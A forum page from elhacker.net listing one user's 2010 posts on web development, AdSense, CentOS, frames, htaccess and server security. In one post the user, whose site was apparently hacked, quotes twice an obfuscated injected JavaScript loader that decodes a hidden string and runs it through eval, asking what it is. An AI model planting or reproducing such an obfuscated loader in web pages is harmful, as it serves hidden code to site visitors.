elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Temas
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11
61  Programación / Desarrollo Web / Eliminar algo ya existente en html? en: 2 Diciembre 2010, 03:32 am
Hey hola....

Hay un codigo codificaado con ioncube, al general el output html, muestra un mensaje encerrado en un cuadro amarillo, muy molesto, busque en la base de datos, y no esta alli, por lo que el contenido de este cuadro fue insertado manualmente en algun archivo codificado, es por eso que me gustaria saber, si con algun javascript tal vez, pueda eliminar el mensaje inmediatamente la pagina sea renderizada, pues.. es eso posible?

gracias, saludos
62  Seguridad Informática / Nivel Web / virus en archivo html? / y algunos php en: 11 Noviembre 2010, 21:40 pm
Hola... parece que hackearon un sitio que tenia, nada importante pero me preocupa, es de un VPS asi que tengo todos los permisos, tiene cpanel instalado...

en mis archivos index o home aparecieron de la nada estos codigos js:
Citar
<script language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd =  this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
var ez=window
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {return $a}var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1'; BKbk34b32=

Mas abajo luego de mas codigo.
Citar
var $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101,118,97)+'l']($$())
</script>
<script language="javascript">
var kasbd3412 = "";
$$ = function () { try{kasbd3412= $$dfsd(gnflseejrr()); kasbd3412.do(); } catch(e){ var bn = ""; return kasbd3412;}};
var adlan3r$oubw = "e";$$dfsd =  this['a'+'s'+'d'];var adlan3r$ouaw = "a";
function asd(df_){this['r']="";
var s = df_;
for(__fh=0;this['__fh']<s['l'+adlan3r$oubw+'ng'+'t'+'h'];__fh++ ){i=__fh;if(s['ch'+adlan3r$ouaw +'rA'+'t'](i)=='Z'){this[neAR_DEF_FGEvftDSyTtnSoh_1]='%'} else {this[neAR_DEF_FGEvftDSyTtnSoh_1]=s['ch'+'ar'+'At'](this['i'])}this['r']=r+VAR_EZJrWcTGuhPYZJj(this,neAR_DEF_FGEvftDSyTtnSoh_1)}
return this['unesc'+adlan3r$ouaw + 'p'+adlan3r$oubw](r)}
var ez=window
VAR_AiCzwbiiMdphDXs=(function(VAR_JMFILTCeLQNWkAf,VAR_gqWQtFFAsjjtVqK){return VAR_JMFILTCeLQNWkAf[VAR_gqWQtFFAsjjtVqK];
});
VAR_EZJrWcTGuhPYZJj=(function(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF){return VAR_AiCzwbiiMdphDXs(VAR_wiSIHKenjOMRPsE,VAR_SfXtSSNCWJXwgQF);
});
function gnflseejrr() {return $a}var neAR_DEF_FGEvftDSyTtnSoh_1='s'+'1'; BKbk34b32=

Sigue mas y mas codigo hasta que acaba:
Citar
var $a = BKbk34b32.replace(/98/g, "Z");
ez[String.fromCharCode(101,118,97)+'l']($$())
</script>

Que podra ser?
63  Foros Generales / Foro Libre / Que es un crédito o facturación <prorrata>? en: 16 Septiembre 2010, 00:37 am
Pues foreros, me preguntaba que es ese concepto de prorrata, aplicado pues a facturar, créditos y demás...

Que es que me facturen algo a prorrata? :P

gracias!
64  Programación / Desarrollo Web / Alguien me explica lo de Google adsense? en: 18 Agosto 2010, 19:48 pm
Que son estos conceptos del panel de adsense?

Impresiones de página   
Clics   CTR de la página   
eCPM de la página
Ingresos estimados

A google no le entiendo realmente xD... las impresiones son las mismas visitas diarias? y el CTR qué es?... veo herramientas como http://www.seochat.com/?go=1&option=com_seotools&tool=24 que me preguntan esos datos de adsense pero no sabría que colocar para obtener una estadística... en una página por ejemplo donde todos los visitantes dan click, cuanto da en Click Through Rate (%)?

Saludos!
65  Sistemas Operativos / GNU/Linux / Instalador de CentOS 5.5 LiveCD? en: 10 Agosto 2010, 00:53 am
Holas,

Es que tengo que instalar Centos 5.5 ya que necesito hacer varias pruebas de un software antes de comprarlo (que corre bajo Centos) entonces buscaba alguna forma de instalar el CentOS 5.5 desde el LiveCD, es esto posible?
Alguno podría ayudarme? no encuentro mucha informacion en la web :P o tal vez es muchísima..
66  Programación / Desarrollo Web / problema con php y phppgadmin en: 11 Julio 2010, 04:03 am
hola, es que instalo el modulo de postgresql y todo va bien pero cuando accedo a phpPgAdmin me dice:

Su versión de PHP no tiene el soporte correcto de bases de datos.

Tengo isntalado soporte para php4 y php5, habrá alguna confusion por esto?
67  Programación / Desarrollo Web / Certificado SSL (https) es inseguro en chrome (esta pagina contiene otros etc... en: 10 Julio 2010, 04:32 am
Como lo soluciono?

Aparece:
esta página incluye otros recursos que no son seguros. Estos pueden ser visualizados por otros usuarios mientras están en tránsito y pueden ser modificados por un atacante para cambiar el aspecto y el comportamiento de la página.

Y no tengo idea como solucionarlo,...

muchas gracias, saludos!
68  Programación / Desarrollo Web / Seguridad en un servidor en: 3 Julio 2010, 22:39 pm
Hola.

Hace poco adquiri una maquina pequeña para hacer mis cosas y mis trabajos, en fin, venia instalado con cPanel, asi que administro el servidor con whm, pero mas alla de eso me inquieta la seguridad, alguno me podria pasar una guia o decirme como asegurar mi servidor lo mejor que pueda? eso nada mas.. muchas gracias!

saludos...
69  Programación / Desarrollo Web / Problema con frames en: 21 Junio 2010, 04:23 am
Holas,

Resulta que tengo una web, la cual dividiré en dos lados, cada lado será un frame, sin embargo, necesito que la ruta en el navegador se altere si voy a login, les pongo un ejemplo:

Hay dos lados

Lado A
Lado B

En Lado A hay un botón que lleva a Login, lleva a: ../../login/index.php
Pero, cuando doy Click en Login (que está en Lado A) Obviamente la ruta en el navegador no se altera, se queda igual (misitio.com)...

¿Como hago para que en la URL aparezca igual (misitio.com) ?... o sea, poner Lado A como frame maestro o algo así xD.

Estoy usando Frameset, no me sirve un iframe corriente porque necesito que la pantalla se divida completamente, y un iframe lo que inserta es un objeto, y no me sirve así ya que el tamaño no es automático, ¿o es posible hacer que un iframe tenga un tamaño total al de la web?

saludo
70  Programación / Desarrollo Web / redireccion con htaccess? en: 17 Junio 2010, 04:41 am
Hola, mmm estaba buscando en la red pero nada me funciona...

Como hago con htaccess para que redirija de un sitio:
index.php?id=3
A:
cualquiercarpeta/ids/3

Con htaccess.

No es que sean urls amigas, no no... la segunda url es un documento estatico y "fisico"... simplemente es que con htaccess no consigo que lo haga:
Redirect /index.php?id=3 http://pagina.com/cualquiercarpeta/ids/3

No me sirve :P

Alguna sugerencia?
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines